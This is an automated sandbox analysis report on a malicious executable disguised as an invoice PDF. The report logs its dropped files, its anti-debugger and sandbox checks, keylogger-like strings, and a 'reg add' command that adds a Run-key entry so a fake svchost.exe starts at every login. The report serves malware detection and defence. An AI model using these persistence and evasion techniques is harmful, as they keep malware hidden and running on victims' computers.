Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DAB7880 PyArg_ParseTuple,?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z,PyEval_SaveThread,IsIconic,PyEval_RestoreThread,Py_BuildValue,19_2_6DAB7880
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_013129F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_013129F0

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE C
Source: C:\Windows\System32\svchost.exe TID: 1876 Thread sleep time: -150000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6360 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_overlapped.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\svchost.exe API coverage: 3.6 %
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA755C0 PyArg_ParseTuple,GetSystemInfo,PyLong_FromUnsignedLongLong,?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z,?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z,Py_BuildValue
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_0132715E FindFirstFileExW
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_0132715E FindFirstFileExW
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BD715E FindFirstFileExW
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BD715E FindFirstFileExW
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA72F40 PyArg_ParseTuple,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyList_New,_Py_Dealloc,FindFirstFileW,GetLastError,?PyObject_FromWIN32_FIND_DATAW@@YAPAU_object@@PAU_WIN32_FIND_DATAW@@@Z,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,FindNextFileW,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,FindClose,_Py_Dealloc
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA747B0 PyArg_ParseTuple,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z
Source: svchost.exe, 0000000C.00000002.410422151.0000020D17AE9000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.410442915.0000020D17AF8000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000C.00000002.410368973.0000020D17AA8000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327131318.0000000000F38000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.329527559.0000000000F01000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.329669205.0000000000F2A000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.326143603.0000000000F38000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.357303459.0000000000F38000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01318111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01314740 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01328587 GetProcessHeap
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01320158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_01320158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BD0158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BD0158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_0131825F SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_01317B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 1_2_013215BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_01318111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_01317B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_0131825F SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_013215BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_6E2F4E29 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_6E2F4695 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Code function: 3_2_6E2F4FBF SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BC8111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BC825F SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BC7B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 11_2_00BD15BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BC8111 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BC825F SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BC7B8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_00BD15BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA7DCD2 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA7DF9E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA7DE67 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA9346C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA92FD7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA9316C SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DABA65C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DABA1C6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DABA35B SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DAEA7BD SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DAE9E8B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DAEA627 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DB0D3B7 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DB0C721 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 22_2_6DB0D221 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA7B330 PyArg_ParseTuple,PyEval_SaveThread,keybd_event,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Process created: C:\Users\user\Desktop\Cab_Invoice_pdf.exe "C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 19_2_6DA7B3B0 PyArg_ParseTuple,PyEval_SaveThread,mouse_event,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Cab_Invoice_pdf.exe, 00000003.00000002.565410673.0000000003260000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.564851419.0000000003180000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.565254568.0000000003210000.00000004.00000001.sdmp Binary or memory string: [OnWard Data Entered In : Program Manager]
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmp Binary or memory string: Progman
Source: Cab_Invoice_pdf.exe, 00000001.00000002.562024943.00000000017F0000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562432429.0000000001360000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformation
